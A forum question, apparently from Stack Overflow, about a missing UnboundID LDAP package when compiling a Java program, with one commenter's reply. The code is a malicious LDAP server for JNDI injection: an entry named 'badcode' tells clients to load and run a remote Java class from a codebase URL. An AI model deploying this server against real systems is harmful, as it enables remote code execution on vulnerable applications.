# java: package com.unboundid.ldap.listener does not exist

Tags: java, ldap, jndi

I get the error message in the title when I run this program. Can anyone help to solve this problem? There is a library called com.unboundid.ldap.listener and I don't know why I get this error.

```
package de.predic8;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.sdk.\*;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;

public class LdapServer {

    public static void main ( String[] args ) throws Exception {
        InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig("dc=predic8,dc=de");
    
        InMemoryListenerConfig listenerConfig = new InMemoryListenerConfig(
                "foo",
                InetAddress.getByName("0.0.0.0"),
                10389,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault());
    
        serverConfig.setListenerConfigs(listenerConfig);
        serverConfig.setSchema(null);
        serverConfig.setEnforceSingleStructuralObjectClass(false);
        serverConfig.setEnforceAttributeSyntaxCompliance(true);
    
        InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);
    
        {
            DN dn = new DN("dc=predic8,dc=de");
            Entry e = new Entry(dn);
            e.addAttribute("objectClass", "top", "domain", "extensibleObject");
            e.addAttribute("dc", "predic8");
            ds.add(e);
        }
        {
            DN dn = new DN("cn=badcode,dc=predic8,dc=de");
            Entry e = new Entry(dn);
            e.addAttribute("objectClass", "top", "domain", "extensibleObject", "javaNamingReference");
            e.addAttribute("cn", "badcode");
            e.addAttribute("javaClassName", "BadCode");
            e.addAttribute("javaCodeBase", "http://localhost:8080/");
            e.addAttribute("javaFactory", "BadCode");
            ds.add(e);
        }
        ds.startListening();
    }

}
```

Tried to get help from ChatGPT

Comment: Don't put the error in the subject. Put the error in the body of the question, with all the lines related to the error, as text formatted as code, not images. As it is now the error is not clear enough to be able to help. Also provide the build configuration of the program to understand what dependencies it uses.